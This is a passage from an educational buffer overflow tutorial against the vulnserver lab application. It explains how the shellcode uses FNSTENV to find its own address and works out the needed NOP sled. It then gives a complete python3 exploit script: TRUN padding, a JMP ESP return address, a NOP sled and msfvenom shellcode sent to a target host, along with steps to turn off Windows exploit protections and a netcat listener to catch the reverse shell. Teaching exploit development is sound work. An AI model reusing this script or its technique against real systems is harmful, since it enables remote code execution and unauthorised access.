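# First 12 bytes of the shellcode used in this guide's exploit script.
first_bytes = b"\xb8\xdf\xf1\x63\x55\xda\xde\xd9\x74\x24\xf4\x5b"

# (length in bytes, mnemonic) - decoded by hand, not by a library.
decoded = [
    (5, "mov eax, 0x5563f1df"),   # b8 + 32-bit immediate (little endian)
    (2, "fcmovu st(0), st(6)"),   # the "some floating point operation"
    (4, "fnstenv [esp-0xc]"),     # d9 74 24 f4
    (1, "pop ebx"),               # 5b
]

# The hand-decoded lengths must account for every byte.
assert sum(length for length, _ in decoded) == len(first_bytes)

offset = 0
fnstenv_offset = None
for length, mnemonic in decoded:
    raw = first_bytes[offset:offset + length].hex(" ")
    print(f"{offset:2d}: {raw:<16} {mnemonic}")
    if mnemonic.startswith("fnstenv"):
        fnstenv_offset = offset
    offset += length
```

For these bytes fnstenv_offset ends up as 7, which is the offset used in the calculation further down.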

For a detailed explanation for these instructions you can consult this great article. Here I'll try to focus only on what's important for us.

Since shellcode can land anywhere in memory it cannot rely on any hardcoded addresses. Therefore, the first thing that this shellcode attempts to do is to get a reference to where it is located, that is, to obtain its own EIP. The technique of using FNSTENV for that purpose is described here and here.

The FNSTENV instruction stores the 28-byte floating point environment structure at the specified address. One field of that structure, located at offset 12, holds the address of the most recently executed floating point instruction, which is why the shellcode executes one right before FNSTENV. By storing the structure at ESP - 0xC (12 bytes below the ESP), that field ends up exactly at the address the ESP currently points to. This way, the next pop instruction loads the address of that floating point instruction, and with it a reference to the shellcode's own location, into the specified register (ebx in our example).
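
The alignment can be checked with a few lines of arithmetic. The field offsets below follow the 32-bit protected mode layout of the floating point environment as I know it from the Intel manuals; the ESP value and the helper name field_addresses are hypothetical and only serve the illustration.

```python
# (offset inside the structure, field name) for the 28-byte environment.
FPU_ENV_32 = [
    (0,  "control word"),
    (4,  "status word"),
    (8,  "tag word"),
    (12, "FPU instruction pointer offset"),
    (16, "FPU instruction pointer selector / opcode"),
    (20, "FPU data pointer offset"),
    (24, "FPU data pointer selector"),
]
ENV_SIZE = 28


def field_addresses(esp: int, displacement: int = -0xC) -> dict:
    """Map each field to the address it gets for FNSTENV [ESP+displacement]."""
    base = esp + displacement
    return {name: base + offset for offset, name in FPU_ENV_32}


esp = 0x00B8F9E0  # hypothetical stack pointer value
addresses = field_addresses(esp)

# The instruction pointer field lands exactly where the ESP points to,
# so a following POP retrieves it.
assert addresses["FPU instruction pointer offset"] == esp

# The structure spans 12 bytes below the ESP and 16 bytes from the ESP on.
assert (esp - 0xC) + ENV_SIZE == esp + 16
```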

During runtime of our exploit the ESP points to the first byte of our shellcode, and the FNSTENV instruction sits 7 bytes after that (see the offset in the disassembly). When it writes its 28 bytes, 12 bytes below the ESP and 16 more bytes starting from the ESP, it therefore overwrites part of the shellcode, including bytes that weren't even executed yet. To be precise: 7 bytes of already executed shellcode, the 4 bytes of the FNSTENV instruction itself and then (16-7-4=) 5 bytes of shellcode that weren't executed yet.

And finally, this is the real reason for the necessary NOP sled. We must avoid the shellcode overwriting itself which we can achieve by prepending it with (at least) 5 NOP bytes.
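
The same calculation as a small sketch, in case your shellcode places FNSTENV at a different offset. The constants are the values from this chapter (28-byte structure, displacement of -12, FNSTENV at offset 7 with a length of 4 bytes); the function names are made up for illustration.

```python
ENV_SIZE = 28        # bytes written by FNSTENV
DISPLACEMENT = -12   # FNSTENV [ESP-0xC]
FNSTENV_OFFSET = 7   # offset of FNSTENV inside the shellcode
FNSTENV_LEN = 4      # length of the FNSTENV instruction itself


def clobbered_unexecuted_bytes(nop_count: int) -> int:
    """Count not yet executed shellcode bytes that FNSTENV overwrites.

    All positions are relative to the ESP at the moment JMP ESP runs,
    which is also where the NOP sled (or the shellcode) begins.
    """
    write_end = DISPLACEMENT + ENV_SIZE  # first byte after the write (16)
    next_instruction = nop_count + FNSTENV_OFFSET + FNSTENV_LEN
    return max(0, write_end - next_instruction)


def minimum_nop_sled() -> int:
    """Smallest sled for which no unexecuted byte gets overwritten."""
    nop_count = 0
    while clobbered_unexecuted_bytes(nop_count) > 0:
        nop_count += 1
    return nop_count


assert clobbered_unexecuted_bytes(0) == 5  # the 5 bytes from the text
assert minimum_nop_sled() == 5
```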

On a final note, you'll likely never make the effort of calculating the exact amount of necessary NOP bytes ever again if you can just use a generic 32-byte NOP sled. However, this chapter was to demonstrate that there is absolutely nothing mysterious or random about this buffer overflow. So next time someone tells you that you have to use a NOP sled "because you have to" - you now know a bit more.

Exploiting the Target

Finally, we've made it all the way to the actual exploit writing. Up until now we didn't have to write a single line of code to understand how to exploit this particular buffer overflow.

For this part I'm going to use python3 but you can attempt to use any language that you feel comfortable with. Some people even use PowerShell... (While I don't agree with some of the technical representations, the PowerShell solution is amazing.)

Basically, we just have to combine the different pieces that we collected throughout the chapters:

The buffer must start with TRUN .
After 2012 bytes we start overwriting the RIP value, so we can create the necessary padding with: b"TRUN ." (6 bytes) + b"A"*(2012-6)
For the return address we chose 0x625011AF
Following the return address comes the NOP sled: b"\x90"*5
At the end comes the shellcode that we generated with msfvenom

When using python3 the socket.send() method requires a bytes object rather than a regular string. Thus, all string literals will be prefixed with a b. Alternatively, we could use "string".encode('latin1') for every string.
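
The choice of latin1 for the alternative matters. A quick check, using the NOP byte as an example, shows that latin1 maps every character below 0x100 to exactly one byte, while the default encoding of str.encode() (UTF-8) turns 0x90 into two bytes and would corrupt the payload:

```python
nop_char = "\x90"

as_latin1 = nop_char.encode("latin1")
as_utf8 = nop_char.encode("utf-8")  # what .encode() does without arguments

assert as_latin1 == b"\x90"      # one byte, as intended
assert as_utf8 == b"\xc2\x90"    # two bytes, shifts everything after it
assert nop_char.encode() == as_utf8
```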

There is one final thing to note. We know that we must place the address 0x625011AF on the stack. But as previously explained, the values on the stack are stored in little endian format. So if we want to create the value 0x625011AF we actually have to write the single bytes in reverse order. Therefore, to create that address on the stack we must write the bytes 0xAF 0x11 0x50 0x62.
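
If you'd rather not reverse the bytes by hand, Python can do the conversion. This is just an optional convenience using the standard library; the constant name JMP_ESP_ADDRESS is made up for illustration.

```python
import struct

JMP_ESP_ADDRESS = 0x625011AF

# "<I" means: little endian, unsigned 32-bit integer.
packed = struct.pack("<I", JMP_ESP_ADDRESS)
assert packed == b"\xAF\x11\x50\x62"

# int.to_bytes produces the same four bytes.
assert JMP_ESP_ADDRESS.to_bytes(4, "little") == packed
```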

Stitching all of what we've gathered together in a single script, we get the following.

#!/usr/bin/env python3

# import socket library for connection to the server
import socket

# Shellcode created with msfvenom
buf  = b"\xb8\xdf\xf1\x63\x55\xda\xde\xd9\x74\x24\xf4\x5b\x31"
# CLIPPED FOR BREVITY
buf += b"\xaf\x67\x70\x1c\x77\x94\x08\x0d\x12\x9a\xbf\x2e\x37"
shellcode = buf

# Create a TCP socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Use the socket to connect to the target vulnserver
s.connect(('10.0.2.9',9999))

# Use the starting bytes "TRUN ." to trigger the call to Function3
trigger_command = b'TRUN .'

# Create a padding that will fill the assigned buffer and overwrite the EBP
padding = b'A'*(2012 - len(trigger_command)) 

# Little endian representation of the address to the JMP ESP instruction
# This will overwrite the return instruction pointer (which will be loaded
# into the EIP register)
overwrite_rip = b'\xAF\x11\x50\x62'

# A NOP sled to avoid the shellcode overwriting itself
nop_sled = b'\x90'*5

# Combine all the pieces to form the payload
payload = trigger_command + padding + overwrite_rip + nop_sled + shellcode

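# Send the payload to the vulnserver
# (sendall keeps sending until the complete payload has been transmitted)
s.sendall(payload)

# Close the connection
s.close()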

And that's it, we're done. Let's test that exploit.

A small reminder if you've been following along with a Windows 11 target. In order for this exploit to work, you must disable the Mandatory ASLR option under "App & browser control" > "Exploit protection settings" - restart the virtual machine and then also disable Real-time protection under "Virus & threat protection settings".

Open a simple netcat listener with nc -nlvp 80, make the script executable with chmod +x exploit.py and finally run it.

We successfully triggered the reverse shell.

Final Notes

We've tried to trace the entire process all the way from locating the vulnerable entry point up to successfully spawning a reverse shell - writing and firing only a single exploit script.

It's pretty much obvious that this method quickly becomes very tedious and far more difficult once the target application gets more complex. Using the tools and methodologies shown in the more practical tutorials is definitely recommended and sufficient for most challenges you'll encounter in CTFs for example.

However, I hope that you were able to gain at least something out of whatever this here ended up being and do now have a deeper understanding of the basic buffer overflow. Or maybe you were just equally as curious and can now sleep a tiny bit better.

Either way, I'm gladly taking feedback on any of the above. You can find me over at TCM's Discord and drop me a message anytime (I trust that you can find me) - or if you'd rather be subtle feel free to smash one of those smiley faces.

Practical Buffer Overflow Introductions

If you want to follow a more practical and user friendly introduction - you can try one of these:

Acknowledgements

Huge thanks to my proof-readers and @TCM Security for the great support.
